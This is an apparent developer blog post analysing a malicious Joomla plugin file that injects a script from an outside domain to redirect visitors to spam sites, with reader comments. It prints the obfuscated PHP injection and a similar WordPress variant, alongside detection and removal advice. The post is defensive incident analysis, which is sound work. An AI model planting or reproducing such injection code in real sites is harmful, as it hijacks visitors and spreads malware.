On a site I support I found this infected code in the /plugins directory. The infected file injects JavaScript code into the top of the rendered HTML page, above the <head> tag. The infected file only runs once a day, per user, so it’s hard to spot.
For a user’s first visit of the day, when not logged in, a PHP script runs. The PHP injects JavaScript, that in turn injects jqscr.com/XXxxxXXn. On the page load the user gets redirected away from the site, usually to a “spammy” website.
One way to tell if a site is infected is view the source code of the homepage in a new incognito window. Is there any JavaScript above the <head> tag? Another way is check the browser for a cookie, on the domain, named r_ok with the value of 1.
We only found this hack, because this client emailed a large mailing list. When these people clicked the link, they got redirected to a spammy site. Many of them reported this strange behavior back to us.
JavaScript Injected Above The <head> Tag
The following JavaScript was injected above the head tag, on a Joomla site. I redacted the page name to XXxxxXXn for the scripts src, assuming the original page name is a unique tracking code. The injected script looks like this:
<script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>
<script>
var khutmhpx = document.createElement("script");
khutmhpx.src = "https://jqscr.com/XXxxxXXn";
document.getElementsByTagName("head")[0].appendChild(khutmhpx);
</script>What the code above is doing:
- imports a jquery v3.3.1 script library
- creates var khutmhpx as script tag.
- sets khutmhpx src to
https://jqscr.com/XXxxxXXn - appends khutmhpx to the html head
- executes khutmhpx on the page load
https://jqscr.com/then redirects the visitor off the siteXXxxxXXn
The Scope Of This Hack Is growing:
On March 22 publicwww.com showed 196 sites infected with jqscr.com 196. That number has been growing over the last few months, in Spring 2023:
- March 22: 196 sites
- April 18th: 1332 sites
- May 4th: 1552 sites
The Infected Joomla Plugin
The infected code is injection from /plugins/system/settings/settings.php. This is not part of the real Joomla settings. This is just a random php file in the /plugins directory. I assume this was copied there by some other Joomla Plugin or Component, but I do not know yet which one.
The main part of /plugins/system/settings/settings.php looks like this:
if ( $user -> id > 0 ) {
// user route
} else {
// non-user route
$current_url = JUri::getInstance();
if (stristr($current_url, "/admin")) {
// admin-panel route
} else {
if ( ! isset( $_COOKIE[base64_decode('cl9vaw==')]) ) {
setcookie( base64_decode( 'cl9vaw==' ), 1, time() + 86400, base64_decode( 'Lw==' ) );
echo '
<script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>
<script>
var khutmhpx = document.createElement("script");
khutmhpx.src = "https://jqscr.com/XXxxxXXn";
document.getElementsByTagName("head")[0].appendChild(khutmhpx);
</script>
';
}
}
}What /plugins/system/settings/settings.php code shown above is doing:
if ( $user -> id > 0 ) {ignores visitors who are logged in.if (stristr($current_url, "/admin")) {ignores pages in the “/admin” path, that’s a little odd because Joomla uses “/administrator/”.if ( ! isset( $_COOKIE[base64_decode('cl9vaw==')]) ) { setcookie( base64_decode( 'cl9vaw==' ), 1, time() + 86400, base64_decode( 'Lw==' ) );limits execution to just once a day by setting a cookie for 86400 seconds (24 hours). That’s a good trick. When you go back to the page to try to figure out what happened, the script will be gone.echo ' <script src="https://code.jquery.com/jquery-3.3.1.min.js"></script> <script> var khutmhpx = document.createElement("script"); khutmhpx.src = "https://jqscr.com/XXxxxXXn"; document.getElementsByTagName("head")[0].appendChild(khutmhpx); </script> ';injects the jquery library and javascript code above the<head>.
The cookie name base64_decode( 'cl9vaw==' ) decodes to r_ok. If the site has a cookie on your domain named r_ok, with the value of 1, the site is infected.
Mitigation
Remove the hack by deleting the code in: /plugins/system/settings/settings.php.
What I have done for now is remove the echo of the khutmhpx injection script from settings.php, and modify the cookie. The modify cookie duration is 30 days, and the value is set to “plugin disabled”. I can monitor the cookie’s value to make sure this rogue script has not been reinstalled.
setcookie( base64_decode( 'cl9vaw==' ), 'plugin disabled', time() + 86400 * 30, base64_decode( 'Lw==' ) );I’m still not sure yet how this hack got on this Joomla site. I did not build this site, and it uses a lot of plugins. About 1/2 of them I’ve never used before. So I need to backtrack and review each plugin and component that was upgraded over the last month when the hack was installed.
Have you seen this hack? Any ideas where it came from?
Similar To A Hack On WordPress
There is/was a similar hack on WordPress websites last year. Reported on SUCURI in March 2022. The injected script is 99% the same, just the target scr has changed. The old src was https://jquery0.com/XXxXXxxX. Same jquery-3.3.1.min.js, same var khutmhpx, same, document.getElementsByTagName("head")[0].appendChild(khutmhpx):
var khutmhpx = document.createElement('script');
khutmhpx.src = 'https://jquery0.com/XXxXXxxX';
document.getElementsByTagName('head')[0].appendChild(khutmhpx);https://blog.sucuri.net/2022/12/fake-jquery-domain-redirects-site-visitors-scam.html
Thanks you too.
I had the same issue.
Very strange, this plugin is no more in joomla 4.3.1 files.
Don’t know when it was installed (v1.0.0 date 01-01-2022 Author Joomla! Project), strange date!
But it can be uninstalled.
For the moment just desactivate the plugin and add you patch. Will manage some test before uninstallation.
I download my website files into my computer, and my antivisus (AVAST) found this infected file OK but good new it found only one infected file.
Wow, thank you very much for providing this article.
I spent many many hours finding the code.
Thank you very much again.